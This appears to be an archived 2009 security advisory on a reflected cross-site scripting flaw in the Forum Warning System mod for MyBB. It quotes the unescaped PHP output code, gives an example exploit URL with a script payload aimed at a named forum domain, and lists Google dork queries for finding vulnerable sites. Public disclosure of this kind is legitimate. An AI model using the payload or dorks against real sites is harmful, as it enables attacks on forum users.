Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21379
HistoryFeb 23, 2009 - 12:00 a.m.

MyBB (FWS Mod) reflected XSS

2009-02-2300:00:00
vulners.com
30

MyBB (FWS Mod) reflected XSS
Mod Name: Forum Warning System (http://community.mybboard.net/attachment.php?aid=6814)
Vulnerable piece of code:
//USERCP AND PM CHANGES
elseif($file == "usercp.php" || $file == "private.php")
{
if(function_exists("imagecreatefrompng") && $mybb->user['fws_warnings'] != 0)
{
if($mybb->user['fws_warnings'] <= 14 && $mybb->user['fws_warnings'] > 0) $addition = " ".fws_warning_colour($mybb->user['fws_warnings']."%");
$fws_current_w_level = '<img src="fws.php?action=image&wl='.$mybb->user['fws_warnings'].'" alt="'.$mybb->user['fws_warnings'].'%" title="'.$mybb->user['fws_warnings'].'%" border="0" />'.$addition;
}
Example: http://mybboard.it/forum/fws.php?action=image&amp;wl=/&#92;&lt;sCRIPT&gt;alert&#40;&quot;xss&quot;&#41;&lt;/sCRIPT&gt;&#92;
Google dork: inurl:fws.php
"MyBB" inurl:fws.php